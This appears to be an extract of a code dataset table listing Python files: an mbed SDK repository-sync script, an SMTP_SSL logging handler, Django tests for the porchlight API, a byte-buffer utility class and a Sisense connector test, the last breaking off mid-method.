text (stringlengths 6-947k) | repo_name (stringlengths 5-100) | path (stringlengths 4-231) | language (stringclasses, 1 value) | license (stringclasses, 15 values) | size (int64, 6-947k) | score (float64, 0-0.34)
---|---|---|---|---|---|---
"""
mbed SDK
Copyright (c) 2011-2013 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
One repository to update them all
On mbed.org the mbed SDK is split up into multiple repositories; this script
takes care of updating them all.
"""
import sys
from copy import copy
from os import walk, remove, makedirs
from os.path import join, abspath, dirname, relpath, exists, isfile
from shutil import copyfile
from optparse import OptionParser
import re
import string
ROOT = abspath(join(dirname(__file__), ".."))
sys.path.insert(0, ROOT)
from workspace_tools.settings import MBED_ORG_PATH, MBED_ORG_USER, BUILD_DIR
from workspace_tools.paths import *
from workspace_tools.utils import run_cmd
MBED_URL = "mbed.org"
MBED_USER = "mbed_official"
changed = []
push_remote = True
quiet = False
commit_msg = ''
# Code that has a mirror in the mbed SDK
# Tuple data: (repo_name, list_of_code_dirs, [team])
# team is optional - if not specified, the code is published under mbed_official
OFFICIAL_CODE = (
("mbed-dev" , MBED_BASE),
("mbed-rtos", RTOS),
("mbed-dsp" , DSP),
("mbed-rpc" , MBED_RPC),
("lwip" , LWIP_SOURCES+"/lwip"),
("lwip-sys", LWIP_SOURCES+"/lwip-sys"),
("Socket" , LWIP_SOURCES+"/Socket"),
("lwip-eth" , ETH_SOURCES+"/lwip-eth"),
("EthernetInterface", ETH_SOURCES+"/EthernetInterface"),
("USBDevice", USB),
("USBHost" , USB_HOST),
("CellularModem", CELLULAR_SOURCES),
("CellularUSBModem", CELLULAR_USB_SOURCES),
("UbloxUSBModem", UBLOX_SOURCES),
("UbloxModemHTTPClientTest", [TEST_DIR+"/net/cellular/http/common", TEST_DIR+"/net/cellular/http/ubloxusb"]),
("UbloxModemSMSTest", [TEST_DIR+"/net/cellular/sms/common", TEST_DIR+"/net/cellular/sms/ubloxusb"]),
("FATFileSystem", FAT_FS, "mbed-official"),
)
# Code that has dependencies on libraries should point to the latest revision
# of those libraries. By default, dependencies point to a specific revision.
CODE_WITH_DEPENDENCIES = (
# Libraries
"EthernetInterface",
# RTOS Examples
"rtos_basic",
"rtos_isr",
"rtos_mail",
"rtos_mutex",
"rtos_queue",
"rtos_semaphore",
"rtos_signals",
"rtos_timer",
# Net Examples
"TCPEchoClient",
"TCPEchoServer",
"TCPSocket_HelloWorld",
"UDPSocket_HelloWorld",
"UDPEchoClient",
"UDPEchoServer",
"BroadcastReceive",
"BroadcastSend",
# mbed sources
"mbed-src-program",
)
# A list of regular expressions that will be checked against each directory
# name and skipped if they match.
IGNORE_DIRS = (
)
IGNORE_FILES = (
    'COPYING',
    r'\.md',
    r'\.lib',
    r'\.bld'
)
def ignore_path(name, reg_exps):
for r in reg_exps:
if re.search(r, name):
return True
return False
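# Illustrative examples (not part of the original script): re.search matches
# anywhere in the name, so ignore_path('README.md', IGNORE_FILES) is True
# (it matches the r'\.md' pattern), while ignore_path('main.py', IGNORE_FILES)
# is False.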
class MbedRepository:
@staticmethod
def run_and_print(command, cwd):
stdout, _, _ = run_cmd(command, wd=cwd, redirect=True)
print(stdout)
def __init__(self, name, team = None):
self.name = name
self.path = join(MBED_ORG_PATH, name)
if team is None:
self.url = "http://" + MBED_URL + "/users/" + MBED_USER + "/code/%s/"
else:
self.url = "http://" + MBED_URL + "/teams/" + team + "/code/%s/"
if not exists(self.path):
# Checkout code
if not exists(MBED_ORG_PATH):
makedirs(MBED_ORG_PATH)
self.run_and_print(['hg', 'clone', self.url % name], cwd=MBED_ORG_PATH)
else:
# Update
self.run_and_print(['hg', 'pull'], cwd=self.path)
self.run_and_print(['hg', 'update'], cwd=self.path)
def publish(self):
# The maintainer has to evaluate the changes first and explicitly accept them
self.run_and_print(['hg', 'addremove'], cwd=self.path)
stdout, _, _ = run_cmd(['hg', 'status'], wd=self.path)
if stdout == '':
print "No changes"
return False
print stdout
if quiet:
commit = 'Y'
else:
commit = raw_input(push_remote and "Do you want to commit and push? Y/N: " or "Do you want to commit? Y/N: ")
if commit == 'Y':
args = ['hg', 'commit', '-u', MBED_ORG_USER]
if commit_msg:
args = args + ['-m', commit_msg]
self.run_and_print(args, cwd=self.path)
if push_remote:
self.run_and_print(['hg', 'push'], cwd=self.path)
return True
# Check if a file is a text file or a binary file
# Taken from http://code.activestate.com/recipes/173220/
text_characters = "".join(map(chr, range(32, 127)) + list("\n\r\t\b"))
_null_trans = string.maketrans("", "")
def is_text_file(filename):
block_size = 1024
def istext(s):
if "\0" in s:
return 0
if not s: # Empty files are considered text
return 1
# Get the non-text characters (maps a character to itself then
# use the 'remove' option to get rid of the text characters.)
t = s.translate(_null_trans, text_characters)
# If more than 30% non-text characters, then
# this is considered a binary file
if float(len(t))/len(s) > 0.30:
return 0
return 1
with open(filename) as f:
res = istext(f.read(block_size))
return res
# Return the line ending type for the given file ('cr' for LF-style endings,
# 'crlf' for CRLF endings)
def get_line_endings(f):
examine_size = 1024
try:
tf = open(f, "rb")
lines, ncrlf = tf.readlines(examine_size), 0
tf.close()
for l in lines:
if l.endswith("\r\n"):
ncrlf = ncrlf + 1
return 'crlf' if ncrlf > len(lines) >> 1 else 'cr'
except:
return 'cr'
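# Note: the result is a majority vote over the sampled lines: a file is
# reported as 'crlf' only when more than half of them end in "\r\n"
# (len(lines) >> 1 is integer division by two).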
# Copy file to destination, but preserve destination line endings if possible
# This prevents very annoying issues with huge diffs that appear because of
# differences in line endings
def copy_with_line_endings(sdk_file, repo_file):
if not isfile(repo_file):
copyfile(sdk_file, repo_file)
return
is_text = is_text_file(repo_file)
if is_text:
sdk_le = get_line_endings(sdk_file)
repo_le = get_line_endings(repo_file)
if not is_text or sdk_le == repo_le:
copyfile(sdk_file, repo_file)
else:
print "Converting line endings in '%s' to '%s'" % (abspath(repo_file), repo_le)
f = open(sdk_file, "rb")
data = f.read()
f.close()
f = open(repo_file, "wb")
data = data.replace("\r\n", "\n") if repo_le == 'cr' else data.replace('\n','\r\n')
f.write(data)
f.close()
def visit_files(path, visit, match=None):
    for root, dirs, files in walk(path):
        # Ignore hidden directories
        for d in copy(dirs):
            full = join(root, d)
            if d.startswith('.'):
                dirs.remove(d)
            elif ignore_path(full, IGNORE_DIRS):
                print "Skipping '%s'" % full
                dirs.remove(d)
        for file in files:
            if ignore_path(file, IGNORE_FILES):
                continue
            # When 'match' patterns are given, only visit files that match them
            if match is not None and not ignore_path(file, match):
                continue
            visit(join(root, file))
def update_repo(repo_name, sdk_paths, team_name):
repo = MbedRepository(repo_name, team_name)
# copy files from mbed SDK to mbed_official repository
def visit_mbed_sdk(sdk_file):
repo_file = join(repo.path, relpath(sdk_file, sdk_path))
repo_dir = dirname(repo_file)
if not exists(repo_dir):
makedirs(repo_dir)
copy_with_line_endings(sdk_file, repo_file)
for sdk_path in sdk_paths:
visit_files(sdk_path, visit_mbed_sdk)
# remove repository files that do not exist in the mbed SDK
def visit_repo(repo_file):
for sdk_path in sdk_paths:
sdk_file = join(sdk_path, relpath(repo_file, repo.path))
if exists(sdk_file):
break
else:
remove(repo_file)
print "remove: %s" % repo_file
visit_files(repo.path, visit_repo)
if repo.publish():
changed.append(repo_name)
def update_code(repositories):
for r in repositories:
repo_name, sdk_dir = r[0], r[1]
team_name = r[2] if len(r) == 3 else None
print '\n=== Updating "%s" ===' % repo_name
        sdk_dirs = sdk_dir if isinstance(sdk_dir, list) else [sdk_dir]
update_repo(repo_name, sdk_dirs, team_name)
def update_single_repo(repo):
repos = [r for r in OFFICIAL_CODE if r[0] == repo]
if not repos:
print "Repository '%s' not found" % repo
else:
update_code(repos)
def update_dependencies(repositories):
for repo_name in repositories:
print '\n=== Updating "%s" ===' % repo_name
repo = MbedRepository(repo_name)
# point to the latest libraries
def visit_repo(repo_file):
with open(repo_file, "r") as f:
url = f.read()
with open(repo_file, "w") as f:
f.write(url[:(url.rindex('/')+1)])
        visit_files(repo.path, visit_repo, MBED_REPO_EXT)
if repo.publish():
changed.append(repo_name)
def update_mbed():
update_repo("mbed", [join(BUILD_DIR, "mbed")], None)
def do_sync(options):
global push_remote, quiet, commit_msg, changed
push_remote = not options.nopush
quiet = options.quiet
commit_msg = options.msg
    changed = []
if options.code:
update_code(OFFICIAL_CODE)
if options.dependencies:
update_dependencies(CODE_WITH_DEPENDENCIES)
if options.mbed:
update_mbed()
if options.repo:
update_single_repo(options.repo)
if changed:
print "Repositories with changes:", changed
return changed
if __name__ == '__main__':
parser = OptionParser()
parser.add_option("-c", "--code",
action="store_true", default=False,
help="Update the mbed_official code")
parser.add_option("-d", "--dependencies",
action="store_true", default=False,
help="Update the mbed_official code dependencies")
parser.add_option("-m", "--mbed",
action="store_true", default=False,
help="Release a build of the mbed library")
parser.add_option("-n", "--nopush",
action="store_true", default=False,
help="Commit the changes locally only, don't push them")
parser.add_option("", "--commit_message",
action="store", type="string", default='', dest='msg',
help="Commit message to use for all the commits")
parser.add_option("-r", "--repository",
action="store", type="string", default='', dest='repo',
help="Synchronize only the given repository")
parser.add_option("-q", "--quiet",
action="store_true", default=False,
help="Don't ask for confirmation before commiting or pushing")
(options, args) = parser.parse_args()
do_sync(options)
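# Example invocations (illustrative):
#   python workspace_tools/synch.py -c                # update all official repos
#   python workspace_tools/synch.py -r mbed-rtos      # synchronize one repository
#   python workspace_tools/synch.py -c -q --commit_message "Sync with SDK"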
| bikeNomad/mbed | workspace_tools/synch.py | Python | apache-2.0 | 11,453 | 0.005413 |
#!/usr/bin/env python
#
#
"""Test harness for the logging module. Tests BufferingSMTPHandler, an alternative implementation
of SMTPHandler.
Copyright (C) 2001-2002 Vinay Sajip. All Rights Reserved.
Modified to handle SMTP_SSL connections
"""
import string, logging, logging.handlers
from logging import Formatter
class BufferingSMTP_SSLHandler(logging.handlers.BufferingHandler):
'''
Modified to handle SMTP_SSL connections
'''
# Copyright 2001-2002 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
# This file is part of the Python logging distribution. See
# http://www.red-dove.com/python_logging.html
def __init__(self, server, port, username, password, fromaddr, toaddrs, subject, capacity):
logging.handlers.BufferingHandler.__init__(self, capacity)
self.fromaddr = fromaddr
self.toaddrs = toaddrs
self.subject = subject
self.mailhost = server
self.mailport = port
self.username = username
self.password = password
self.setFormatter(logging.Formatter("%(asctime)s %(levelname)-5s %(message)s"))
def flush(self):
if len(self.buffer) > 0:
try:
import smtplib
smtp = smtplib.SMTP_SSL(self.mailhost, self.mailport)
msg = "From: %s\r\nTo: %s\r\nSubject: %s\r\n\r\n" % (self.fromaddr, string.join(self.toaddrs, ","), self.subject)
for record in self.buffer:
s = self.format(record)
print s
msg = msg + s + "\r\n"
smtp.login(self.username, self.password)
smtp.sendmail(self.fromaddr, self.toaddrs, msg)
smtp.quit()
except:
self.handleError(None) # no particular record
self.buffer = []
'''
Set up logging
'''
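# Note: 'app' below is assumed to be the Flask application object, created
# elsewhere in the importing module; it is not defined in this file.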
if app.config['LOG_TO_FILE']:
file_handler = logging.handlers.RotatingFileHandler(
app.config['LOG_FILENAME'],
maxBytes=100000,
backupCount=5)
file_handler.setLevel(app.config['LOG_FILE_LEVEL'])
file_handler.setFormatter(Formatter(
'%(asctime)s %(levelname)s: %(message)s '
'[in %(pathname)s:%(lineno)d]'
))
app.logger.addHandler(file_handler)
if app.config['LOG_TO_EMAIL']:
mail_handler = BufferingSMTP_SSLHandler(
app.config['MAIL_SERVER'],
app.config['MAIL_PORT'],
app.config['MAIL_USERNAME'],
app.config['MAIL_PASSWORD'],
app.config['DEFAULT_MAIL_SENDER'],
app.config['LOG_EMAIL_TO'],
app.config['LOG_EMAIL_SUBJECT'],
0,
)
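    # Note: capacity=0 makes BufferingHandler.shouldFlush() return True for
    # every record, so each message at or above this handler's level is
    # emailed immediately rather than batched.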
mail_handler.setLevel(logging.WARNING)
mail_handler.setFormatter(Formatter('''
Message type: %(levelname)s
Location: %(pathname)s:%(lineno)d
Module: %(module)s
Function: %(funcName)s
Time: %(asctime)s
Message:
%(message)s
'''))
app.logger.addHandler(mail_handler)
| gary-dalton/Twenty47 | twenty47/logging.py | Python | mit | 3,990 | 0.003509 |
# -*- coding: utf-8 -*-
from django.test import TestCase
import mock
import datetime
from dateutil import tz
## Repository Test
from porchlightapi.models import Repository
# Constant values used for testing
UNDEPLOYED_VALUE_TUPLE = ('c9d2d5b79edd7d4acaf7172a98203bf3aee2586a',
datetime.datetime(year=1972, month=3, day=17, hour=8, minute=23, tzinfo=tz.tzutc()),
5)
DEPLOYED_VALUE_TUPLE = ('ba60a64b151e402a9f08f95710ec09db4649eb2e',
datetime.datetime(year=1972, month=2, day=29, hour=10, minute=45, tzinfo=tz.tzutc()),
2)
class RepositoryTestCase(TestCase):
def setUp(self):
# Create a repository object for us to test
Repository.objects.create(
url='https://github.com/cfpb/porchlight',
name='Porchlight',
project='System Tools',
deployed_value_source='porchlightapi.sources.random_source',
undeployed_value_source='porchlightapi.sources.random_source',
value_calculator='porchlightapi.sources.difference_value_calculator')
@mock.patch("porchlightapi.sources.random_source")
def test_undeployed_value_source(self, random_source):
"""
Test that the model's undeployed_value() function correctly
uses the lookup function to get and run the mock data source
function.
"""
random_source.return_value = UNDEPLOYED_VALUE_TUPLE
test_repo = Repository.objects.get(url='https://github.com/cfpb/porchlight')
undeployed_value_tuple = test_repo.undeployed_value()
self.assertEqual(undeployed_value_tuple[0], UNDEPLOYED_VALUE_TUPLE[0])
self.assertEqual(undeployed_value_tuple[1], UNDEPLOYED_VALUE_TUPLE[1])
self.assertEqual(undeployed_value_tuple[2], UNDEPLOYED_VALUE_TUPLE[2])
@mock.patch("porchlightapi.sources.random_source")
def test_deployed_value_source(self, random_source):
"""
Test that the model's undeployed_value() function correctly
uses the lookup function to get and run the mock data source
function.
"""
random_source.return_value = DEPLOYED_VALUE_TUPLE
test_repo = Repository.objects.get(url='https://github.com/cfpb/porchlight')
deployed_value_tuple = test_repo.deployed_value()
self.assertEqual(deployed_value_tuple[0], DEPLOYED_VALUE_TUPLE[0])
self.assertEqual(deployed_value_tuple[1], DEPLOYED_VALUE_TUPLE[1])
self.assertEqual(deployed_value_tuple[2], DEPLOYED_VALUE_TUPLE[2])
@mock.patch("porchlightapi.sources.difference_value_calculator")
def test_value(self, difference_value_calculator):
"""
Test that the model's value() function correctly uses the lookup function
to get and run the value calculator function.
"""
difference_value_calculator.return_value = 3
test_repo = Repository.objects.get(url='https://github.com/cfpb/porchlight')
self.assertEqual(test_repo.value(UNDEPLOYED_VALUE_TUPLE, DEPLOYED_VALUE_TUPLE),
5 - 2)
## Value Data Points
from porchlightapi.models import ValueDataPointManager
class ValueDataPointManagerTestCase(TestCase):
@mock.patch('porchlightapi.models.ValueDataPoint')
def test_create_datapoint(self, ValueDataPoint):
"""
Test the ValueDataPointManager's creation of ValueDataPoint
objects from Repository objects. The manager should populate
the ValueDataPoint using the Repository's value methods, which
call the appropriate callables.
"""
# Create a mock repository to pass to the ValueDataPointManager
# create_datapoint() method with the appropriate return values.
mock_repository = mock.create_autospec(Repository)
mock_repository.undeployed_value.return_value = UNDEPLOYED_VALUE_TUPLE
mock_repository.deployed_value.return_value = DEPLOYED_VALUE_TUPLE
mock_repository.value.return_value = 3
# We want to test that the create_datapoint method extracts the correct
# values from the repository and calls the default create() method with
# those values.
objects = ValueDataPointManager()
objects.create = mock.MagicMock()
datapoint = objects.create_datapoint(mock_repository)
objects.create.assert_called_with(
repository=mock_repository,
undeployed_identifier=UNDEPLOYED_VALUE_TUPLE[0],
undeployed_datetime=UNDEPLOYED_VALUE_TUPLE[1],
undeployed_value=UNDEPLOYED_VALUE_TUPLE[2],
deployed_identifier=DEPLOYED_VALUE_TUPLE[0],
deployed_datetime=DEPLOYED_VALUE_TUPLE[1],
deployed_value=DEPLOYED_VALUE_TUPLE[2],
value=3)
## Test Data Sources
import datetime
from porchlightapi.sources import github_commit_source
from porchlightapi.sources import github_tag_source
from porchlightapi.sources import json_file_source
class GithubDataSourceTestCase(TestCase):
def setUp(self):
"""
Set up the mock request responses for Github.
"""
# Call to /repos/porchlight is only interested in size
self.mock_repo_response = mock.MagicMock()
self.mock_repo_response.json.return_value = {u'size': 1619,}
# Call to /repos/porchlight/branches/master is used to
# get last commit SHA and URL
self.mock_branches_response = mock.MagicMock()
self.mock_branches_response.json.return_value = {u'commit':
{u'sha': u'130df1874519c11a79ac4a2e3e6671a165860441',
u'url': u'https://api.github.com/repos/cfpb/porchlight/commits/130df1874519c11a79ac4a2e3e6671a165860441'}
}
# Call to /repos/porchlight/tags is used to get latest commit SHA and
# tag name
self.mock_tags_response = mock.MagicMock()
self.mock_tags_response.json.return_value = [{
u'commit':{u'sha':u'130df1874519c11a79ac4a2e3e6671a165860441'},
u'name':u'v0.1.0'
},]
self.mock_no_tags_response = mock.MagicMock()
self.mock_no_tags_response.json.return_value = [{
u'commit':{u'sha':u'130df1874519c11a79ac4a2e3e6671a165860441'},
u'name':u'atag'
},]
# Call to the commit itself /repos/porchlight/commits/130df1874519c11a79ac4a2e3e6671a165860441
# is used to get the date and file data
self.mock_commit_response = mock.MagicMock()
self.mock_commit_response.json.return_value = {
u'commit': {u'committer': {u'date': u'2015-01-26 21:44:20Z',},},
u'files':[
{'additions': 1, 'deletions': 2, 'changes':3},
{'additions': 4, 'deletions': 5, 'changes':6},
{'additions': 7, 'deletions': 8, 'changes':9},
]
}
        self.test_date = datetime.datetime(year=2015, month=1, day=26, hour=21,
                                           minute=44, second=20, tzinfo=tz.tzutc())
# A mock repository with a URL
self.mock_repository = mock.create_autospec(Repository)
self.mock_repository.url = 'https://github.com/cfpb/porchlight'
@mock.patch("requests.get")
def test_github_commit_source(self, mock_request_get):
# Test that our Github source function correctly constructs URLs by
# mocking requests.get()
# There should be 3 calls to request.get(), one for the repository (to
# get size), one for branches, and one for commits.
# XXX: Because we're not using the repo size, it's been commented out to
# reduce API hits.
mock_request_get.side_effect = [
# self.mock_repo_response,
self.mock_branches_response,
self.mock_commit_response
]
source_tuple = github_commit_source(self.mock_repository)
self.assertEqual(source_tuple[0], '130df1874519c11a79ac4a2e3e6671a165860441')
self.assertEqual(source_tuple[1], self.test_date)
self.assertEqual(source_tuple[2], 15)
@mock.patch("requests.get")
def test_github_tag_source(self, mock_request_get):
# Test that our Github source function correctly constructs URLs by
# mocking requests.get().
# For tags there should be two calls to request.get(), one for tags and
# then one for the commit for the tag we're interested in.
mock_request_get.side_effect = [
self.mock_tags_response,
self.mock_commit_response
]
source_tuple = github_tag_source(self.mock_repository)
self.assertEqual(source_tuple[0], '130df1874519c11a79ac4a2e3e6671a165860441')
self.assertEqual(source_tuple[1], self.test_date)
self.assertEqual(source_tuple[2], 15)
# Now test that if there is no tag that matches our pattern that we
# return as close to a 'no-value' as we can.
mock_request_get.side_effect = [
self.mock_no_tags_response,
self.mock_commit_response
]
source_tuple = github_tag_source(self.mock_repository)
self.assertEqual(source_tuple[0], '')
self.assertEqual(source_tuple[1], None)
self.assertEqual(source_tuple[2], 0)
@mock.patch("__builtin__.open")
@mock.patch("json.load")
@mock.patch("requests.get")
def test_repo_json(self, mock_request_get, mock_json_load, mock_open):
        test_date = datetime.datetime(year=2015, month=1, day=26, hour=21,
                                      minute=44, second=20, tzinfo=tz.tzutc())
# We just want to ignore the call to open() altogether
mock_open.return_value = None
# Mock the contents of the json file.
mock_json_load.return_value = [{u'commit': '130df1874519c11a79ac4a2e3e6671a165860441',
u'repo': 'https://github.com/CFPB/porchlight.git',
u'date': u'Mon Jan 26 21:44:20 UTC 2015'},]
# Mock the requests.get() calls to github API. This differs from
# github_commit_source() above because we get the commit SHA from the
# json data rather than from the tip of a branch.
mock_request_get.side_effect = [
# self.mock_repo_response,
self.mock_commit_response
]
source_tuple = json_file_source(self.mock_repository)
self.assertEqual(source_tuple[0], '130df1874519c11a79ac4a2e3e6671a165860441')
self.assertEqual(source_tuple[1], self.test_date)
self.assertEqual(source_tuple[2], 15)
## Test Value Calculators
from django.db import models
from porchlightapi.sources import incremental_value_calculator
class ValueCalculatorTestCase(TestCase):
def test_incremental_value_calculator(self):
mock_repository = mock.MagicMock()
mock_repository.datapoints = mock.MagicMock()
# Test an empty list of datapoints — should return the undeployed value
# tuple's value.
mock_repository.datapoints.all.return_value = []
value = incremental_value_calculator(mock_repository,
UNDEPLOYED_VALUE_TUPLE, DEPLOYED_VALUE_TUPLE)
self.assertEqual(value, 5)
# Test a prior datapoint to make sure its value is incremented by the
# undeployed value tuple's value.
mock_last_datapoint = mock.MagicMock()
mock_last_datapoint.value = 2
mock_repository.datapoints.all.return_value = [mock_last_datapoint,]
value = incremental_value_calculator(mock_repository,
UNDEPLOYED_VALUE_TUPLE, DEPLOYED_VALUE_TUPLE)
self.assertEqual(value, 7)
# Test the same value tuple to simulate deployed and undeployed being on
# the same commit, to make sure the returned value is 0.
value = incremental_value_calculator(mock_repository,
UNDEPLOYED_VALUE_TUPLE, UNDEPLOYED_VALUE_TUPLE)
self.assertEqual(value, 0)
| cfpb/porchlight | porchlightapi/tests.py | Python | cc0-1.0 | 12,039 | 0.004902 |
"""
* Copyright (C) Caleb Marshall and others... - All Rights Reserved
* Written by Caleb Marshall <anythingtechpro@gmail.com>, May 27th, 2017
* Licensing information can found in 'LICENSE', which is part of this source code package.
"""
import struct
class Endianness(object):
"""
A enum that stores network endianess formats
"""
NATIVE = '='
LITTLE_ENDIAN = '<'
BIG_ENDIAN = '>'
NETWORK = '!'
class DataBufferError(IOError):
"""
A data buffer specific io error
"""
class DataBufferIO(object):
"""
A class for manipulating (reading and/or writing) an array of bytes
"""
BYTE_ORDER = Endianness.NETWORK
def __init__(self, data=bytes(), offset=0):
self.data = data
self.offset = offset
@property
def byte_order(self):
return self.BYTE_ORDER
@property
def remaining(self):
return self.data[self.offset:]
def read(self, length):
data = self.remaining[:length]
self.offset += length
return data
def write(self, data):
if not data:
return
self.data += data
def clear(self):
self.data = bytes()
self.offset = 0
def read_from(self, fmt):
data = struct.unpack_from(self.byte_order + fmt, self.data, self.offset)
self.offset += struct.calcsize(fmt)
return data
def write_to(self, fmt, *args):
self.write(struct.pack(self.byte_order + fmt, *args))
def read_byte(self):
return self.read_from('b')[0]
def write_byte(self, value):
self.write_to('b', value)
def read_ubyte(self):
return self.read_from('B')[0]
def write_ubyte(self, value):
self.write_to('B', value)
def read_bool(self):
return self.read_from('?')[0]
def write_bool(self, value):
self.write_to('?', value)
def read_short(self):
return self.read_from('h')[0]
def write_short(self, value):
self.write_to('h', value)
def read_ushort(self):
return self.read_from('H')[0]
def write_ushort(self, value):
self.write_to('H', value)
def read_int(self):
return self.read_from('i')[0]
def write_int(self, value):
self.write_to('i', value)
def read_uint(self):
return self.read_from('I')[0]
def write_uint(self, value):
self.write_to('I', value)
def read_long(self):
return self.read_from('l')[0]
def write_long(self, value):
self.write_to('l', value)
def read_ulong(self):
return self.read_from('L')[0]
def write_ulong(self, value):
self.write_to('L', value)
def read_long_long(self):
return self.read_from('q')[0]
def write_long_long(self, value):
self.write_to('q', value)
def read_ulong_long(self):
return self.read_from('Q')[0]
def write_ulong_long(self, value):
self.write_to('Q', value)
def read_float(self):
return self.read_from('f')[0]
def write_float(self, value):
self.write_to('f', value)
def read_double(self):
return self.read_from('d')[0]
def write_double(self, value):
self.write_to('d', value)
def read_char(self):
return self.read_from('s')[0]
def write_char(self, value):
self.write_to('s', value)
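# Minimal usage sketch (illustrative, not part of the original module):
#   buf = DataBufferIO()
#   buf.write_ushort(0x1234)          # packed in network (big-endian) order
#   buf.write_float(1.5)
#   reader = DataBufferIO(buf.data)
#   assert reader.read_ushort() == 0x1234
#   assert reader.read_float() == 1.5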
| AnythingTechPro/curionet | curionet/io.py | Python | apache-2.0 | 3,368 | 0.001485 |
#!/usr/bin/python
#
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from unittest import mock
from typing import Any, Dict
from google.cloud import datacatalog
from google.datacatalog_connectors.commons import prepare as commons_prepare
from google.datacatalog_connectors.sisense import prepare
class AssembledEntryFactoryTest(unittest.TestCase):
__PREPARE_PACKAGE = 'google.datacatalog_connectors.sisense.prepare'
__FACTORY_MODULE = f'{__PREPARE_PACKAGE}.assembled_entry_factory'
__FACTORY_CLASS = f'{__FACTORY_MODULE}.AssembledEntryFactory'
__PRIVATE_METHOD_PREFIX = f'{__FACTORY_CLASS}._AssembledEntryFactory'
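    # Note: the prefix above mirrors Python's private-name mangling, so the
    # class's double-underscore methods can be patched in the tests below as
    # '<factory module>.AssembledEntryFactory._AssembledEntryFactory__<name>'.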
@mock.patch(f'{__PREPARE_PACKAGE}.datacatalog_tag_factory'
f'.DataCatalogTagFactory')
@mock.patch(f'{__FACTORY_MODULE}.datacatalog_entry_factory'
f'.DataCatalogEntryFactory')
def setUp(self, mock_entry_factory, mock_tag_factory):
self.__factory = prepare.AssembledEntryFactory(
project_id='test-project',
location_id='test-location',
entry_group_id='test-entry-group',
user_specified_system='test-system',
server_address='https://test.server.com')
self.__mock_entry_factory = mock_entry_factory.return_value
self.__mock_tag_factory = mock_tag_factory.return_value
def test_constructor_should_set_instance_attributes(self):
attrs = self.__factory.__dict__
self.assertEqual(
self.__mock_entry_factory,
attrs['_AssembledEntryFactory__datacatalog_entry_factory'])
@mock.patch(f'{__PRIVATE_METHOD_PREFIX}'
f'__make_assembled_entries_for_folder')
def test_make_assembled_entries_list_should_process_folders(
self, mock_make_assembled_entries_for_folder):
folder = self.__make_fake_folder()
mock_make_assembled_entries_for_folder.return_value = \
[commons_prepare.AssembledEntryData('test-folder', {})]
assembled_entries = self.__factory.make_assembled_entries_list(
folder, {})
self.assertEqual(1, len(assembled_entries))
mock_make_assembled_entries_for_folder.assert_called_once()
@mock.patch(f'{__PRIVATE_METHOD_PREFIX}'
f'__make_assembled_entries_for_dashboard')
def test_make_assembled_entries_list_should_process_dashboards(
self, mock_make_assembled_entries_for_dashboard):
dashboard = self.__make_fake_dashboard()
mock_make_assembled_entries_for_dashboard.return_value = \
[commons_prepare.AssembledEntryData('test-dashboard', {})]
assembled_entries = self.__factory.make_assembled_entries_list(
dashboard, {})
self.assertEqual(1, len(assembled_entries))
mock_make_assembled_entries_for_dashboard.assert_called_once()
@mock.patch(f'{__PRIVATE_METHOD_PREFIX}__make_assembled_entry_for_folder')
def test_make_assembled_entries_for_folder_should_process_folder(
self, mock_make_assembled_entry_for_folder):
folder = self.__make_fake_folder()
tag_templates_dict = {}
assembled_entries = self.__factory\
._AssembledEntryFactory__make_assembled_entries_for_folder(
folder, tag_templates_dict)
self.assertEqual(1, len(assembled_entries))
mock_make_assembled_entry_for_folder.assert_called_once_with(
folder, tag_templates_dict)
@mock.patch(f'{__PRIVATE_METHOD_PREFIX}__make_assembled_entry_for_folder')
def test_make_assembled_entries_for_folder_should_process_child_folders(
self, mock_make_assembled_entry_for_folder):
child_folder = self.__make_fake_folder()
parent_folder = self.__make_fake_folder()
parent_folder['folders'] = [child_folder]
tag_templates_dict = {}
assembled_entries = self.__factory\
._AssembledEntryFactory__make_assembled_entries_for_folder(
parent_folder, tag_templates_dict)
self.assertEqual(2, len(assembled_entries))
self.assertEqual(2, mock_make_assembled_entry_for_folder.call_count)
@mock.patch(f'{__PRIVATE_METHOD_PREFIX}'
f'__make_assembled_entry_for_dashboard')
@mock.patch(f'{__PRIVATE_METHOD_PREFIX}__make_assembled_entry_for_folder')
def test_make_assembled_entries_for_folder_should_process_nested_dashboards( # noqa: E501
self, mock_make_assembled_entry_for_folder,
mock_make_assembled_entry_for_dashboard):
dashboard = self.__make_fake_dashboard()
folder = self.__make_fake_folder()
folder['dashboards'] = [dashboard]
tag_templates_dict = {}
assembled_entries = self.__factory\
._AssembledEntryFactory__make_assembled_entries_for_folder(
folder, tag_templates_dict)
self.assertEqual(2, len(assembled_entries))
mock_make_assembled_entry_for_folder.assert_called_once_with(
folder, tag_templates_dict)
mock_make_assembled_entry_for_dashboard.assert_called_once_with(
dashboard, tag_templates_dict)
def test_make_assembled_entry_for_folder_should_make_entry_and_tags(self):
folder = self.__make_fake_folder()
tag_template = datacatalog.TagTemplate()
tag_template.name = 'tagTemplates/sisense_folder_metadata'
